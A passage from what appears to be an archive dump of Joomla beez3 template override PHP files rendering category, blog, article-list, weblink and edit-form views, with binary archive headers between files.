	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php if ($this->params->get('maxLevel') != 0 && is_array($this->children[$this->category->id]) && count($this->children[$this->category->id]) > 0) : ?>
	<div class="cat-children">

	<?php if ($showCategoryTitle === true or $pageSubHeading)
	{
		echo '<h3>';
	}
	elseif ($showCategoryHeadingTitleText === true)
	{
		echo '<h2>';
	} ?>
	<?php if ($showCategoryHeadingTitleText === true) : ?>
		<?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?>
	<?php endif; ?>
	<?php if ($showCategoryTitle === true or $pageSubHeading)
	{
		echo '</h3>';
	}
	elseif ($showCategoryHeadingTitleText === true)
	{
		echo '</h2>';
	} ?>
	</div>
	<?php endif; ?>
	<?php echo $this->loadTemplate('children'); ?>
	<div class="cat-items">
		<?php echo $this->loadTemplate('articles'); ?>
	</div>
</section>
PK՜�\a'��(beez3/html/com_content/category/blog.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

$cparams = JComponentHelper::getParams('com_media');

// If the page class is defined, add to class as suffix.
// It will be a separate class if the user starts it with a space
?>
<section class="blog<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading') != 0) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($this->params->get('show_category_title')) : ?>
<h2 class="subheading-category">
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_content.category.title'); ?>
</h2>
<?php endif; ?>

<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php if (empty($this->lead_items) && empty($this->link_items) && empty($this->intro_items)) : ?>
	<?php if ($this->params->get('show_no_articles', 1)) : ?>
		<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
	<?php endif; ?>
<?php endif; ?>

<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? 'system-unpublished' : null; ?>">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php $leadingcount++; ?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php if (!empty($this->intro_items)) : ?>
	<?php $introcount = count($this->intro_items); ?>
	<?php $counter = 0; ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>
		<?php $rowcount = ((int) $key % (int) $this->columns) + 1; ?>
		<?php if ($rowcount === 1) : ?>
			<?php $row = $counter / $this->columns; ?>
			<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-'.$row; ?>">
		<?php endif; ?>
		<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>">
		<?php
			$this->item = &$item;
			echo $this->loadTemplate('item');
		?>
		</article>
		<?php $counter++; ?>
		<?php if ($rowcount === (int) $this->columns or $counter === $introcount) : ?>
			<span class="row-separator"></span>
			</div>
		<?php endif; ?>
	<?php endforeach; ?>

<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<?php echo $this->loadTemplate('links'); ?>
<?php endif; ?>

<?php if ($this->params->get('maxLevel') != 0 && is_array($this->children[$this->category->id]) && count($this->children[$this->category->id]) > 0) : ?>
	<div class="cat-children">

	<?php if ($this->params->get('show_category_heading_title_text', 1) == 1) : ?>
		<h3>
			<?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?>
		</h3>
	<?php endif; ?>
	<?php echo $this->loadTemplate('children'); ?>
	</div>
<?php endif; ?>

<?php if ($this->pagination->pagesTotal > 1 && ($this->params->def('show_pagination', 1) == 1 || $this->params->get('show_pagination') == 2)) : ?>
	<div class="pagination">
	<?php if ($this->params->def('show_pagination_results', 1)) : ?>
		<p class="counter">
		<?php echo $this->pagination->getPagesCounter(); ?>
		</p>
	<?php endif; ?>
	<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>

</section>
PK՜�\��x		4beez3/html/com_content/category/default_children.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

$class  = ' class="first"';
$user   = JFactory::getUser();
$groups = $user->getAuthorisedViewLevels();
?>

<?php if (count($this->children[$this->category->id]) > 0) :?>

	<ul>
	<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
		<?php // Check whether category access level allows access to subcategories. ?>
		<?php if (in_array($child->access, $groups)) : ?>
			<?php
			if ($this->params->get('show_empty_categories') || $child->getNumItems(true) || count($child->getChildren())) :
				if (!isset($this->children[$this->category->id][$id + 1])) :
					$class = ' class="last"';
				endif;
			?>
				<li<?php echo $class; ?>>
				<?php $class = ''; ?>
					<h3 class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($child->id));?>">
						<?php echo $this->escape($child->title); ?></a>
					</h3>
					<?php if ($this->params->get('show_subcat_desc') == 1) :?>
						<?php if ($child->description and $this->params->get('show_description') != 0 ) : ?>
							<div class="category-desc">
								<?php echo JHtml::_('content.prepare', $child->description, '', 'com_content.category'); ?>
							</div>
						<?php endif; ?>
					<?php endif; ?>

					<?php if ($this->params->get('show_cat_num_articles', 1)) : ?>
						<?php if ($child->getNumItems() == true) : ?>
						<dl>
							<dt>
								<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?>
							</dt>
							<dd>
								<?php echo $child->getNumItems(true); ?>
							</dd>
						</dl>
						<?php endif; ?>
					<?php endif; ?>

					<?php if (count($child->getChildren()) > 0 ) :
						$this->children[$child->id] = $child->getChildren();
						$this->category = $child;
						$this->maxLevel--;
						if ($this->maxLevel !== 0) :
							echo $this->loadTemplate('children');
						endif;
						$this->category = $child->getParent();
						$this->maxLevel++;
					endif; ?>
				</li>
			<?php endif; ?>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>

<?php endif; ?>
PK՜�\M���1beez3/html/com_content/category/blog_children.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

$class  = ' class="first"';
$user   = JFactory::getUser();
$groups = $user->getAuthorisedViewLevels();
?>

<?php if (count($this->children[$this->category->id]) > 0) : ?>

	<ul>
	<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
		<?php // Check whether category access level allows access to subcategories. ?>
		<?php if (in_array($child->access, $groups)) : ?>
			<?php
			if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
				if (!isset($this->children[$this->category->id][$id + 1])) :
					$class = ' class="last"';
				endif;
			?>
				<li<?php echo $class; ?>>
				<?php $class = ''; ?>
					<span class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($child->id));?>">
						<?php echo $this->escape($child->title); ?></a>
					</span>

					<?php if ($this->params->get('show_subcat_desc') == 1) :?>
						<?php if ($child->description) : ?>
							<div class="category-desc">
								<?php echo JHtml::_('content.prepare', $child->description, '', 'com_content.category'); ?>
							</div>
						<?php endif; ?>
					<?php endif; ?>

					<?php if ( $this->params->get('show_cat_num_articles', 1)) : ?>
						<dl>
							<dt>
								<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?>
							</dt>
							<dd>
								<?php echo $child->getNumItems(true); ?>
							</dd>
						</dl>
					<?php endif; ?>

					<?php if (count($child->getChildren()) > 0):
						$this->children[$child->id] = $child->getChildren();
						$this->category = $child;
						$this->maxLevel--;
						if ($this->maxLevel !== 0) :
							echo $this->loadTemplate('children');
						endif;
						$this->category = $child->getParent();
						$this->maxLevel++;
					endif; ?>
				</li>
			<?php endif; ?>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>

<?php endif; ?>
PK՜�\a>���"�"4beez3/html/com_content/category/default_articles.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.framework');

$n         = count($this->items);
$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));

// Check for at least one editable article
$isEditable = false;

if (!empty($this->items))
{
	foreach ($this->items as $article)
	{
		if ($article->params->get('access-edit'))
		{
			$isEditable = true;
			break;
		}
	}
}
?>

<?php if (empty($this->items)) : ?>

	<?php if ($this->params->get('show_no_articles', 1)) : ?>
		<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
	<?php endif; ?>

<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm">
	<?php if ($this->params->get('filter_field') !== 'hide') : ?>
	<fieldset class="filters">
		<legend class="hidelabeltxt">
			<?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?>
		</legend>
		<div class="filter-search">
			<?php if ($this->params->get('filter_field') === 'tag') :?>
			<select name="filter_tag" id="filter_tag" onchange="document.adminForm.submit();">
				<option value=""><?php echo JText::_('JOPTION_SELECT_TAG'); ?></option>
				<?php echo JHtml::_('select.options', JHtml::_('tag.options', true, true), 'value', 'text', $this->state->get('filter.tag')); ?>
			</select>
			<?php elseif ($this->params->get('filter_field') === 'month') : ?>
			<select name="filter-search" id="filter-search" onchange="document.adminForm.submit();">
				<option value=""><?php echo JText::_('JOPTION_SELECT_MONTH'); ?></option>
				<?php echo JHtml::_('select.options', JHtml::_('content.months', $this->state), 'value', 'text', $this->state->get('list.filter')); ?>
			</select>
			<?php else : ?>		
			<label class="filter-search-lbl element-invisible" for="filter-search">
				<?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL').'&#160;'; ?>
			</label>
			<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->state->get('list.filter')); ?>" class="inputbox" onchange="document.adminForm.submit();" title="<?php echo JText::_('COM_CONTENT_FILTER_SEARCH_DESC'); ?>" placeholder="<?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL'); ?>" />
			<?php endif; ?>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('filter_field') !== 'hide') :?>
	</fieldset>
	<?php endif; ?>

	<div class="clr"></div>

	<table class="category">
		<?php if ($this->params->get('show_headings')) : ?>
		<thead>
			<tr>
				<th class="list-title" id="tableOrdering">
					<?php echo JHtml::_('grid.sort', 'COM_CONTENT_HEADING_TITLE', 'a.title', $listDirn, $listOrder); ?>
				</th>

				<?php if ($date = $this->params->get('list_show_date')) : ?>
				<th class="list-date" id="tableOrdering2">
					<?php if ($date === 'created') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.created', $listDirn, $listOrder); ?>
					<?php elseif ($date === 'modified') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.modified', $listDirn, $listOrder); ?>
					<?php elseif ($date === 'published') : ?>
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_'.$date.'_DATE', 'a.publish_up', $listDirn, $listOrder); ?>
					<?php endif; ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('list_show_author', 1)) : ?>
				<th class="list-author" id="tableOrdering3">
					<?php echo JHtml::_('grid.sort', 'JAUTHOR', 'author', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('list_show_hits', 1)) : ?>
				<th class="list-hits" id="tableOrdering4">
					<?php echo JHtml::_('grid.sort', 'JGLOBAL_HITS', 'a.hits', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_votes', 0) && $this->vote) : ?>
					<th id="categorylist_header_votes">
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_VOTES', 'rating_count', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_ratings', 0) && $this->vote) : ?>
					<th id="categorylist_header_ratings">
						<?php echo JHtml::_('grid.sort', 'COM_CONTENT_RATINGS', 'rating', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($isEditable) : ?>
					<th id="categorylist_header_edit"><?php echo JText::_('COM_CONTENT_EDIT_ITEM'); ?></th>
				<?php endif; ?>
			</tr>
		</thead>
		<?php endif; ?>

		<tbody>

			<?php foreach ($this->items as $i => &$article) : ?>
			<tr class="cat-list-row<?php echo $i % 2; ?>">

				<?php if (in_array($article->access, $this->user->getAuthorisedViewLevels())) : ?>

					<td class="list-title">
						<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)); ?>">
							<?php echo $this->escape($article->title); ?></a>
					</td>

					<?php if ($this->params->get('list_show_date')) : ?>
					<td class="list-date">
						<?php
							echo JHtml::_(
									'date', $article->displayDate, $this->escape(
											$this->params->get('date_format', JText::_('DATE_FORMAT_LC3'))
									)
							);
						?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_author', 1)) : ?>
					<td class="list-author">
						<?php if (!empty($article->author) || !empty($article->created_by_alias)) : ?>
							<?php $author = $article->created_by_alias ?: $article->author; ?>
							<?php if (!empty($article->contact_link) && $this->params->get('link_author') == true):?>
								<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $article->contact_link, $author)); ?>
							<?php else :?>
								<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
							<?php endif; ?>
						<?php endif; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_hits', 1)) : ?>
					<td class="list-hits">
						<?php echo $article->hits; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('list_show_votes', 0) && $this->vote) : ?>
						<td class="list-votes">
							<?php echo $article->rating_count; ?>
						</td>
					<?php endif; ?>
					<?php if ($this->params->get('list_show_ratings', 0) && $this->vote) : ?>
						<td class="list-ratings">
							<?php echo $article->rating; ?>
						</td>
					<?php endif; ?>
					<?php if ($isEditable) : ?>
						<td class="list-edit">
							<?php if ($article->params->get('access-edit')) : ?>
								<?php echo JHtml::_('icon.edit', $article, $article->params, array(), true); ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>
				<?php else : ?>
				<td>
					<?php
						echo $this->escape($article->title).' : ';
						$menu = JFactory::getApplication()->getMenu();
						$active = $menu->getActive();
						$itemId = $active->id;
						$link   = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
						$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)));
					?>
					<a href="<?php echo $link; ?>" class="register">
					<?php echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?></a>
				</td>
				<?php endif; ?>

			</tr>
			<?php endforeach; ?>
		</tbody>
	</table>
<?php endif; ?>

<?php // Code to add a link to submit an article. ?>
<?php if ($this->category->getParams()->get('access-create')) : ?>
	<?php echo JHtml::_('icon.create', $this->category, $this->category->params, array(), true); ?>
<?php  endif; ?>

<?php // Add pagination links ?>
<?php if (!empty($this->items)) : ?>
	<?php if (($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2)) && ($this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			 <p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>

		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php endif; ?>

	<div>
		<input type="hidden" name="task" value="" />
		<input type="hidden" name="filter_order" value="" />
		<input type="hidden" name="filter_order_Dir" value="" />
		<input type="hidden" name="limitstart" value="" />
	</div>
</form>
<?php endif; ?>
PK՜�\�F|���5beez3/html/com_weblinks/category/default_children.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(WeblinksHelperRoute::getCategoryRoute($child->id)); ?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) : ?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_weblinks.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_num_links') == 1) : ?>
				<dl class="weblink-count"><dt>
					<?php echo JText::_('COM_WEBLINKS_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
			<?php endif; ?>

			<?php if (count($child->getChildren()) > 0 ) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK՜�\�	���2beez3/html/com_weblinks/category/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Code to support edit links for weblinks
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.framework');

// Get the user object.
$user = JFactory::getUser();

// Check if user is allowed to add/edit based on weblinks permissinos.
$canEdit      = $user->authorise('core.edit', 'com_weblinks');
$canCreate    = $user->authorise('core.create', 'com_weblinks');
$canEditState = $user->authorise('core.edit.state', 'com_weblinks');
$n            = count($this->items);
$listOrder    = $this->escape($this->state->get('list.ordering'));
$listDirn     = $this->escape($this->state->get('list.direction'));
?>

<?php if (empty($this->items)) : ?>
	<p> <?php echo JText::_('COM_WEBLINKS_NO_WEBLINKS'); ?></p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString(), ENT_COMPAT, 'UTF-8'); ?>" method="post" name="adminForm" id="adminForm">
	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<fieldset class="filters">
		<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
		<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
		<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
		</fieldset>
	<?php endif; ?>

	<table class="category">
		<?php if ($this->params->get('show_headings') == 1) : ?>

		<thead><tr>

			<th class="title">
					<?php echo JHtml::_('grid.sort',  'COM_WEBLINKS_GRID_TITLE', 'title', $listDirn, $listOrder); ?>
			</th>
			<?php if ($this->params->get('show_link_hits')) : ?>
			<th class="hits">
					<?php echo JHtml::_('grid.sort',  'JGLOBAL_HITS', 'hits', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>
		</tr>
	</thead>
	<?php endif; ?>
	<tbody>
	<?php foreach ($this->items as $i => $item) : ?>
		<?php if ($this->items[$i]->state == 0) : ?>
			<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
		<?php else: ?>
			<tr class="cat-list-row<?php echo $i % 2; ?>" >
		<?php endif; ?>

			<td class="title">
			<p>
				<?php if ($this->params->get('icons') == 0) : ?>
					 <?php echo JText::_('COM_WEBLINKS_LINK'); ?>
				<?php elseif ($this->params->get('icons') == 1) : ?>
					<?php if (!$this->params->get('link_icons')) : ?>
						<?php echo JHtml::_('image', 'system/'.$this->params->get('link_icons', 'weblink.png'), JText::_('COM_WEBLINKS_LINK'), null, true); ?>
					<?php else: ?>
						<?php echo '<img src="'.$this->params->get('link_icons').'" alt="'.JText::_('COM_WEBLINKS_LINK').'" />'; ?>
					<?php endif; ?>
				<?php endif; ?>
				<?php
					// Compute the correct link
					$menuclass = 'category' . $this->pageclass_sfx;
					$link   = $item->link;
					$width  = $item->params->get('width');
					$height = $item->params->get('height');

					if ($width == null || $height == null)
					{
						$width  = 600;
						$height = 500;
					}

					switch ($item->params->get('target', $this->params->get('target')))
					{
						case 1:
							// open in a new window
							echo '<a href="'. $link .'" target="_blank" class="'. $menuclass .'" rel="nofollow">'.
								$this->escape($item->title) .'</a>';
							break;

						case 2:
							// open in a popup window
							$attribs = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width='.$this->escape($width).',height='.$this->escape($height).'';
							echo "<a href=\"$link\" onclick=\"window.open(this.href, 'targetWindow', '".$attribs."'); return false;\">".
								$this->escape($item->title).'</a>';
							break;
						case 3:
							// open in a modal window
							JHtml::_('behavior.modal', 'a.modal');
							echo '<a class="modal" href="'.$link.'"  rel="{handler: \'iframe\', size: {x:'.$this->escape($width).', y:'.$this->escape($height).'}}">'.
								$this->escape($item->title). ' </a>';
							break;

						default:
							// open in parent window
							echo '<a href="'.  $link . '" class="'. $menuclass .'" rel="nofollow">'.
								$this->escape($item->title) . ' </a>';
							break;
					}
				?>
				<?php // Code to add the edit link for the weblink. ?>

						<?php if ($canEdit) : ?>
							<ul class="actions">
								<li class="edit-icon">
									<?php echo JHtml::_('icon.edit', $item, $item->params); ?>
								</li>
							</ul>
						<?php endif; ?>
			</p>
			<?php $tagsData = $item->tags->getItemTags('com_weblinks.weblink', $item->id); ?>
			<?php if ($this->params->get('show_tags', 1)) : ?>
				<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
				<?php echo $this->item->tagLayout->render($tagsData); ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_link_description') and ($item->description != '')) : ?>
				<?php $images = json_decode($item->images); ?>
				<?php  if (isset($images->image_first) and !empty($images->image_first)) : ?>
				<?php $imgfloat = empty($images->float_first) ? $this->params->get('float_first') : $images->float_first; ?>
				<div class="img-intro-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>"> <img
					<?php if ($images->image_first_caption):
						echo 'class="caption"'.' title="' .htmlspecialchars($images->image_first_caption, ENT_COMPAT, 'UTF-8') .'"';
					endif; ?>
					src="<?php echo htmlspecialchars($images->image_first, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_first_alt, ENT_COMPAT, 'UTF-8'); ?>"/> </div>
				<?php endif; ?>
				<?php  if (isset($images->image_second) and !empty($images->image_second)) : ?>
					<?php $imgfloat = empty($images->float_second) ? $this->params->get('float_second') : $images->float_second; ?>
					<div class="pull-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?> item-image"> <img
					<?php if ($images->image_second_caption):
						echo 'class="caption"'.' title="' .htmlspecialchars($images->image_second_caption, ENT_COMPAT, 'UTF-8') .'"';
					endif; ?>
					src="<?php echo htmlspecialchars($images->image_second, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_second_alt, ENT_COMPAT, 'UTF-8'); ?>"/> </div>
				<?php endif; ?>

				<?php echo $item->description; ?>
			<?php endif; ?>
		</td>
		<?php if ($this->params->get('show_link_hits')) : ?>
		<td class="hits">
			<?php echo $item->hits; ?>
		</td>
		<?php endif; ?>
	</tr>
	<?php endforeach; ?>
</tbody>
</table>

	<?php // Code to add a link to submit a weblink. ?>
	<?php /* if ($canCreate) : // TODO This is not working due to some problem in the router, I think. Ref issue #23685 ?>
		<?php echo JHtml::_('icon.create', $item, $item->params); ?>
 	<?php  endif; */ ?>
		<?php if ($this->params->get('show_pagination')) : ?>
		 <div class="pagination">
			<?php if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter">
					<?php echo $this->pagination->getPagesCounter(); ?>
				</p>
			<?php endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
			</div>
		<?php endif; ?>
	</form>
<?php endif; ?>
PK՜�\��cc,beez3/html/com_weblinks/category/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="weblink-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_weblinks.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_weblinks.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>
<?php echo $this->loadTemplate('items'); ?>
<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
	<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
	</div>
<?php endif; ?>
</div>
PK՜�\�-
�PP%beez3/html/com_weblinks/form/edit.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

// Create shortcut to parameters.
$params = $this->state->get('params');
?>

<script type="text/javascript">
	Joomla.submitbutton = function(task)
	{
		if (task === 'weblink.cancel' || document.formvalidator.isValid(document.getElementById('adminForm')))
		{
			<?php echo $this->form->getField('description')->save(); ?>
			Joomla.submitform(task);
		}
	}
</script>
<div class="edit<?php echo $this->pageclass_sfx; ?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
	<h1>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
	<?php endif; ?>
	<form action="<?php echo JRoute::_('index.php?option=com_weblinks&view=form&w_id='.(int) $this->item->id); ?>" method="post" name="adminForm" id="adminForm" class="form-validate form-vertical">
		<div class="btn-toolbar">
			<div class="btn-group">
				<button type="button" class="btn btn-primary" onclick="Joomla.submitbutton('weblink.save')">
					<span class="icon-ok" aria-hidden="true"></span> <?php echo JText::_('JSAVE') ?>
				</button>
			</div>
			<div class="btn-group">
				<button type="button" class="btn" onclick="Joomla.submitbutton('weblink.cancel')">
					<span class="icon-cancel" aria-hidden="true"></span> <?php echo JText::_('JCANCEL') ?>
				</button>
			</div>
		</div>

		<hr class="hr-condensed" />
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('title'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('title'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('alias'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('alias'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('catid'); ?>
			</div>
